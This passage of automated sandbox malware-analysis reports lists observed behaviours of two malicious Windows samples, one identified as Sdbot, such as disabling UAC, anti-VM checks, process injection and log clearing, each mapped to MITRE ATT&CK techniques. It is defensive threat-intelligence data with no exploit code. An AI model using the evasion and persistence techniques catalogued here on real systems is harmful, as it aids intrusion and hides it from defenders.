\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\netapi32.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\netapi32.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\netutils.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\netutils.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\srvcli.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to touch file \"C:\\Windows\\system32\\srvcli.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"7001C67BEF47068236EE34DDF0520175EF6213277034CB0AF321A393295BFE9B\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"ENABLELUA\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" queries volume information of \"C:\\\" at 00000000-00005836-0000010C-127420", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" queries volume information of \"C:\\\" at 00000000-00005836-0000010C-127420", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"IsWow64Process\" with parameter \"5836\" - (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" has section name .data with entropy \"6.80219349642\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"ENABLELUA\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "binary-8", "type": 8, "relevance": 5, "name": "The input sample contains a known anti-VM trick", "description": "Found VM detection artifact \"VMware trick\" in \"sample.bin\" (Offset: 53971)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "registry-10", "type": 3, "relevance": 8, "name": "Modifies the UAC/LUA settings (Account Control)", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"ENABLELUA\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e
https://hybrid-analysis.com/sample/0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e
Hybrid Analysis - Killers
{"size": 782403, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e", "sha256": "0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e", "av_detect": 86, "vx_family": "Sdbot.Generic", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 142, "processes": [{"uid": "00000000-00005952", "name": "0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe", "normalized_path": "C:\\0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe", "sha256": "0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e", "av_label": "Generic.Sdbot", "av_matched": 14, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": 